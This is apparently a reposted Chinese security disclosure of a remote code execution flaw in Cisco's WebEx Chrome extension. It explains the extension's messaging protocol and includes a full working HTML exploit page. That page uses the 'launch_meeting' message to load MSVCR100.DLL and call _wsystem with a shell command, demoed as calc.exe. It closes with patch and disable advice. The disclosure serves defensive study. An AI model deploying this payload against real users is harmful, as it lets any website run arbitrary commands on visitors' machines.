Cisco WebEx奇葩漏洞: 瀏覽器插件存在任意遠程代碼執行漏洞,Cisco的WebEx extension(jlhmfgmfgeifomenelglieieghnjghma)擁有約2,000萬活躍用戶,并且它也是思科Webex視頻會議系統重要的組成部分。
該擴展適用于包含magic模式“cwcsf-nativemsg-iframe-43c85c0d-d633-af5e-c056-32dc7efc570b.html”的任何URL,可以從擴展清單中提取。 請注意,該模式內嵌在iframe中,因此不需要用戶有更多的交互,只需要訪問網站就可以了。
該擴展使用nativeMessaging,所以這個magic字符串可以讓任何網站執行任意代碼!
這個擴展使用的協議很復雜,使用CustomEvent()對象,在Web頁面中和本機代碼之間傳遞JSON消息。
在初始化的過程中,網站使用該擴展發起請求打開一個端口進行通信,如下所示:
document.dispatchEvent(new CustomEvent("connect", { detail: { token: "token" }})); // token can be any string
然后消息可以通過 "message" 事件傳遞到native code。 注意,這里不能是MessageEvent()對象,并且不能使用postMessage API,它們必須是CustomEvent()對象。
有幾種不同的消息類型,例如“hello”,“disconnect”等。最有趣的是“launch_meeting”類型:
document.dispatchEvent(new CustomEvent("message", { detail: {
message: JSON.stringify(msg),
message_type: "launch_meeting",
timestamp: (new Date()).toUTCString(),
token: "token"
}
}));
使用該擴展進行視頻會議的過程中,我dump了初始化消息:
> message.message
"{"DocshowVersion": "1.0",
"FilterSecParameters": "clientparam;clientparam_value",
"GpcProductRoot": "WebEx",
"GpcMovingInSubdir": "Wanta",
"GpcProductVersion": "T30_MC",
"GpcUpgradeManagement": "false",
"GpcCompatibleDesktopClients": "",
"enableQuickLaunch": "1",
"GpcProductDescription": "V2ViRXg=",
"GpcUnpackName": "atgpcdec",
"JMTSignificantFileList": "atgpcext.dll;atmccli.dll;comui.dll;webexmgr.dll;plugin-config.xml;atmgr.exe;ieatgpc.dll;atkbctl.dll;atwbxui15.dll;atcarmcl.dll;attp.dll;atarm.dll;wbxcrypt.dll;mmssl32.dll;libeay32.dll;ssleay32.dll;atmemmgr.dll;wcldll.dll;uilibres.dll;pfwres.dll;wbxtrace.dll;mcres.dll;atresec.dll;atrestc.dll;mfs.dll;mutilpd.dll;wseclient.dll;mticket.dll;wsertp.dll",
"jmtclicklog": "1484862376664",
"GpcExtName": "atgpcext",
"GpcUnpackVersion": "27, 17, 2016, 501",
"GpcExtVersion": "3015, 0, 2016, 1117",
"GpcUrlRoot": "https://join-test.webex.com/client/WBXclient-T30L10NSP15EP1-10007/webex/self",
"GpcComponentName": "YXRtY2NsaS5ETEw=",
"GpcCompressMethod": "7z",
"GpcActiveIniSection": "V2ViRXhfVg==",
"GpcSupportPageUrl": "",
"GpcIniFileName": "Z3BjLnBocD9wbW9kdWxlcz0lN0NNQ19TVEQlN0NDaGF0JTdDUG9sbGluZyU3Q05vdGUlN0NWaWRlb1NoYXJlJTdDV2ViZXhfUkElN0NBUyU3Q1BEJk9TPVZUJnJlcGxhY2VLZXk9VklTVEElN0NTU0YmTE49JmJhc2ljbmFtZT1XZWJFeF9WJk9TX0JpdD0zMg==
...
有大量的屬性,很多屬性都有可能存在代碼執行的問題,下面這些是我挑出來的一些:
"GpcComponentName": "YXRtY2NsaS5ETEw=",
"GpcInitCall": "c3pDb29raWU9SW5pdENvbnRyb2woJUhXTkQpO05hbWVWYWx1ZShMb2dnaW5nVVJMX05hbWUsTG9nZ2luZ1VSTCk7TmFtZVZhbHVlKE1lZXRpbmdJRF9OYW1lLE1lZXRpbmdJRCk7TmFtZVZhbHVlKFNlc3Npb25JRF9OYW1lLFNlc3Npb25JRCk7TmFtZVZhbHVlKEdwY0luaUZpbGVOYW1lX05hbWUsR3BjSW5pRmlsZU5hbWUpO05hbWVWYWx1ZShHcGNVcmxSb290X05hbWUsR3BjVXJsUm9vdCk7TmFtZVZhbHVlKEdwY0V4dFZlcnNpb25fTmFtZSxHcGNFeHRWZXJzaW9uKTtOYW1lVmFsdWUoR3BjVW5wYWNrVmVyc2lvbl9OYW1lLEdwY1VucGFja1ZlcnNpb24pO05hbWVWYWx1ZShHcGNQcm9kdWN0Um9vdF9OYW1lLEdwY1Byb2R1Y3RSb290KTtOYW1lVmFsdWUobG9jYWxyb290c2VjdGlvbnZlcl9OYW1lLGxvY2Fscm9vdHNlY3Rpb252ZXIpO05hbWVWYWx1ZShSZWdUeXBlX05hbWUsUmVnVHlwZSk7TmFtZVZhbHVlKEdwY1Byb2dyZXNzQmFyVGl0bGVfTmFtZSxHcGNQcm9ncmVzc0JhclRpdGxlKTtOYW1lVmFsdWUoR3BjTWVzc2FnZVRpdGxlX05hbWUsR3BjTWVzc2FnZVRpdGxlKTtOYW1lVmFsdWUoZG93bmxvYWRsb2NhbHNldHRpbmdfTmFtZSxkb3dubG9hZGxvY2Fsc2V0dGluZyk7TmFtZVZhbHVlKHByb2R1Y3RuYW1lX05hbWUscHJvZHVjdG5hbWUpO05hbWVWYWx1ZShTRlN1cHBvcnRpbmdfTmFtZSxTRlN1cHBvcnRpbmdfVmFsdWUpO05hbWVWYWx1ZShNZWV0aW5nUmFuZG9tX05hbWUsTWVldGluZ1JhbmRvbSk7TmFtZVZhbHVlKGNsaWVudHBhcmFtX05hbWUsY2xpZW50cGFyYW1fVmFsdWUpO0ZpbmlzaENhbGwoc3pDb29raWUpOw==",
If we decode those strings, we get:
GpcComponentName: "atmccli.DLL"
GpcInitCall: "szCookie=InitControl(%HWND);NameValue(LoggingURL_Name,LoggingURL);NameValue(MeetingID_Name,MeetingID);NameValue(SessionID_Name,SessionID);NameValue(GpcIniFileName_Name,GpcIniFileName);NameValue(GpcUrlRoot_Name,GpcUrlRoot);NameValue(GpcExtVersion_Name,GpcExtVersion);NameValue(GpcUnpackVersion_Name,GpcUnpackVersion);NameValue(GpcProductRoot_Name,GpcProductRoot);NameValue(localrootsectionver_Name,localrootsectionver);NameValue(RegType_Name,RegType);NameValue(GpcProgressBarTitle_Name,GpcProgressBarTitle);NameValue(GpcMessageTitle_Name,GpcMessageTitle);NameValue(downloadlocalsetting_Name,downloadlocalsetting);NameValue(productname_Name,productname);NameValue(SFSupporting_Name,SFSupporting_Value);NameValue(MeetingRandom_Name,MeetingRandom);NameValue(clientparam_Name,clientparam_Value);FinishCall(szCookie);"
將這些字符串解碼,如下所示:
GpcComponentName: "atmccli.DLL"
GpcInitCall: "szCookie=InitControl(%HWND);NameValue(LoggingURL_Name,LoggingURL);NameValue(MeetingID_Name,MeetingID);NameValue(SessionID_Name,SessionID);NameValue(GpcIniFileName_Name,GpcIniFileName);NameValue(GpcUrlRoot_Name,GpcUrlRoot);NameValue(GpcExtVersion_Name,GpcExtVersion);NameValue(GpcUnpackVersion_Name,GpcUnpackVersion);NameValue(GpcProductRoot_Name,GpcProductRoot);NameValue(localrootsectionver_Name,localrootsectionver);NameValue(RegType_Name,RegType);NameValue(GpcProgressBarTitle_Name,GpcProgressBarTitle);NameValue(GpcMessageTitle_Name,GpcMessageTitle);NameValue(downloadlocalsetting_Name,downloadlocalsetting);NameValue(productname_Name,productname);NameValue(SFSupporting_Name,SFSupporting_Value);NameValue(MeetingRandom_Name,MeetingRandom);NameValue(clientparam_Name,clientparam_Value);FinishCall(szCookie);"
這看起來像某種奇怪的腳本語言。 'HWND'的存在表明這是與native code交互,如果我dump atmccli.DLL的導出:
$ dumpbin /nologo /exports atmccli.dll
Dump of file atmccli.dll
ordinal hint RVA name
2 2 0001CC11 ExitControl
24 3 0001CC83 FinishCall
1 4 0001D2F9 InitControl
23 5 0001D556 NameValue
...
看起來像在該腳本語言中調用的函數。 是否可以在這里找一些突破口?
我注意到,他們提供一個CRT(微軟的C Runtime,包含像printf,malloc等標準例程)的副本,所以我試圖調用標準_wsystem()routime(像system(),除了WCHAR字符串),像這樣 :
var msg = {
GpcProductRoot: "WebEx",
GpcMovingInSubdir: "Wanta",
GpcProductVersion: "T30_MC",
GpcUnpackName: "atgpcdec",
GpcExtName: "atgpcext",
GpcUnpackVersion: "27, 17, 2016, 501",
GpcExtVersion: "3015, 0, 2016, 1117",
GpcUrlRoot: "http://127.0.0.1/",
GpcComponentName: btoa("MSVCR100.DLL"),
GpcSuppressInstallation: btoa("True"),
GpcFullPage: "True",
GpcInitCall: btoa("_wsystem(ExploitShellCommand);"),
ExploitShellCommand: btoa("calc.exe"),
}
難以置信,居然執行成功了!
完整EXP
html>
head>
title>Cisco WebEx Exploittitle>
script>
var msg = {
GpcProductRoot: "WebEx",
GpcMovingInSubdir: "Wanta",
GpcProductVersion: "T30_MC",
GpcUnpackName: "atgpcdec",
GpcExtName: "atgpcext",
GpcUnpackVersion: "27, 17, 2016, 501",
GpcExtVersion: "3015, 0, 2016, 1117",
GpcUrlRoot: "http://127.0.0.1/",
GpcComponentName: btoa("MSVCR100.DLL"),
GpcSuppressInstallation: btoa("True"),
GpcFullPage: "True",
GpcInitCall: btoa("_wsystem(ExploitShellCommand);"),
ExploitShellCommand: btoa("calc.exe"),
}
function runcode()
{
if (!document.location.pathname.endsWith("cwcsf-nativemsg-iframe-43c85c0d-d633-af5e-c056-32dc7efc570b.html")) {
alert("document /must/ be named cwcsf-nativemsg-iframe-43c85c0d-d633-af5e-c056-32dc7efc570b.html");
return;
}
if (!document.location.protocol.endsWith("https:")) {
alert("document /must/ be served over https");
return;
}
document.dispatchEvent(new CustomEvent("connect", { detail: { token: "token" }}));
document.dispatchEvent(new CustomEvent("message", { detail: {
message: JSON.stringify(msg),
message_type: "launch_meeting",
timestamp: (new Date()).toUTCString(),
token: "token"
}
}));
}
script>
head>
body onload="runcode()">
h1>Running exploit...h1>
body>
html>
作者上傳了一個測試頁面到如下地址,這個地址是安全的,沒有其他非法代碼執行,僅會彈出一個計算器。
https://lock.cmpxchg8b.com/ieXohz9t/
如果需要測試,你僅需提供姓名、email,不需要注冊即可在下面中測試:
https://www.webex.com/test-meeting.html
該漏洞超過90天漏洞公開原則期限,官方尚未提供補丁,故細節得以公開。
安全客建議
更新官方1.0.3版本:
https://chrome.google.com/webstore/detail/cisco-webex-extension/jlhmfgmfgeifomenelglieieghnjghma?hl=zh-CN
但由于安全社區對該補丁的有效性尚存一定的疑慮,我們建議安裝了Webex的用戶,(hao)暫(hao)時(guo)禁(nian)用(bie)其(wan)瀏(dian)覽(nao)器(jiu)插(xing)件。
看文倉www.kanwencang.com網友整理上傳,為您提供最全的知識大全,期待您的分享,轉載請注明出處。
歡迎轉載:http://www.kanwencang.com/bangong/20170129/96280.html
文章列表
留言列表
